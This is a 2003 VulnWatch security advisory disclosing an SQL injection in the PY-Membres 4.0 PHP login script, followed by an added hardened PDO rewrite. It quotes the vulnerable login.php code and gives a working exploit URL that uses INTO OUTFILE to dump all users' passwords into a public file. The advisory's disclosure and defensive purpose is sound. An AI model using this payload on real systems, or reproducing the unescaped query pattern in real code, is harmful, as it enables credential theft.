[VulnWatch] PY-Membres 4.0 (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 04/06/03

    From: "Frog Man" <leseulfrog@hotmail.com>
    To: vulnwatch@vulnwatch.org
    Date: Sun, 06 Apr 2003 20:16:25 +0200
    
    

    Information :
    -------------
    Website : http://www.py-scripts.com/
    Tested version : 4.0
    PHP Config : magic_quotes_gpc=OFF
    Problem : SQL Injection

    PHP Code/Location :
    -------------------

    login.php :

    ------------------------------------------------------------------------
    <?
    session_start();
    session_name("pys");
    include("config.php");
    include("functions.php");

    est_vide($login,"Vous n\'avez pas saisi de login !");
    est_vide($pass,"Vous n\'avez pas saisi de mot de passe !");
    connexiondb();
    // $login reaches the query unescaped (magic_quotes_gpc=OFF): this is the injection point
    $sql = "SELECT passwd FROM $db_table WHERE login='$login'";
    $req = mysql_query($sql) or die('Erreur SQL !<br>'.$sql.'<br>'.mysql_error());
    $data = mysql_fetch_array($req);
    if($data['passwd'] != $pass)
            {
            echo "<p>Mauvais login / password. Merci de recommencer</p>";
            mysql_close();
            exit;
            }
    else
            {
            $ploginy=$login;
            session_register('ploginy');
            $ip=$REMOTE_ADDR;
            $host=gethostbyaddr($ip);
            $log=date("d/m/Y H\hi | ");
            $log.=$ip." | ".$host;
            $action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE login='$ploginy'") or die (mysql_error()) ;
            mysql_close();
            Header("Location: membre.php");
            }
    ?>
    ------------------------------------------------------------------------

    Exploit :
    ---------
    http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1

    will save all users' passwords into the file http://[target]/file.txt.

    Solution :
    ----------
    A patch can be found on http://www.phpsecure.info.

    More Details In French :
    ------------------------

    http://www.frog-man.org/tutos/PY-Membres4.0.txt

    frog-m@n
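
A hardened counterpart of the login.php lookup quoted in the advisory, given here as an added example; it is not the patch mentioned in the message and not PY-Membres code. It assumes PDO with an in-memory SQLite database, a hypothetical table name `membres` standing in for `$db_table`, and a `passwd` column holding `password_hash()` output rather than plaintext.

```php
<?php
// Added example, not the vendor's patch. Assumptions: PDO + SQLite in memory,
// hypothetical table "membres", passwd stored as password_hash() output.

function check_login(PDO $db, string $login, string $pass): bool
{
    // The login value is bound as a parameter, so quotes or SQL keywords
    // inside it are compared as data and never parsed as SQL.
    $stmt = $db->prepare('SELECT passwd FROM membres WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // No matching row: fail closed instead of comparing against NULL.
    if ($row === false) {
        return false;
    }
    return password_verify($pass, $row['passwd']);
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
// Errors become exceptions; the SQL text is never echoed to the client.
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE membres (login TEXT PRIMARY KEY, passwd TEXT, lastlog TEXT)');
$ins = $db->prepare('INSERT INTO membres (login, passwd) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

$cases = [
    ['alice', 'correct horse'],                                       // valid pair
    ['alice', 'wrong'],                                               // bad password
    ["' OR ISNULL(NULL) INTO OUTFILE '/path/to/site/file.txt", '1'],  // value from the advisory
];
foreach ($cases as [$login, $pass]) {
    $result = check_login($db, $login, $pass) ? 'accepted' : 'rejected';
    printf("%-58s => %s\n", $login, $result);
}
```

The same binding applies to the `UPDATE ... SET lastlog` statement, which interpolates `$ploginy` and `$log` in the original.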
